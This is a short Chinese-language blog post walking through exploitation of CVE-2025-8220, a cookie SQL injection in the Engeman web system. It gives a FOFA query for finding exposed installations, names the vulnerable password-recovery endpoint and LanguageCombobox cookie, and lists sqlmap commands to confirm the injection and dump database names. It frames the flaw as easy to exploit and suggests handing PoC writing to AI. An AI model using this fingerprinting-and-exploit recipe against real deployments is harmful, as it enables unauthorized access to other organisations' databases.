CVE-2025-8220

一个比较简单的漏洞存在于 cookie 中的 SQL 注入漏洞,还是个通用型漏洞,该系统为国外的一款通用 web 系统

https://engeman.com/en/

CVE-2025-8220

CleanShot 2025-09-09 at 19.51.05@2x

fofa 指纹查询语法(巴西那边用的比较多):

body=”content="Engeman®”

CleanShot 2025-09-09 at 19.52.04@2x

打开登录页面后,点击忘记密码并抓包

CleanShot 2025-09-09 at 19.57.11@2x

修改 cookie 中的 LanguageCombobox 字段,添加一个单引号进行测试,可以看到返回的数据包存在报错信息,说明存在SQL注入

CleanShot 2025-09-09 at 19.58.20@2x

1
2
3
4
# 使用sqlmap进行探测
sqlmap -u http://ip/Login/RecoveryPass --cookie 'LanguageCombobox=*' --level 5 --risk 3 --technique=SEB --batch
# 获取数据库列表
sqlmap -u http://ip/Login/RecoveryPass --cookie 'LanguageCombobox=*' --dbs

CleanShot 2025-09-09 at 20.53.42@2x

CleanShot 2025-09-09 at 20.55.35@2x

后续写poc脚本跑什么的甩给AI就可以了,一个很好利用的漏洞


CVE-2025-8220
http://example.com/2025/09/09/CVE-2025-8220/
作者
Winter
发布于
2025年9月9日
许可协议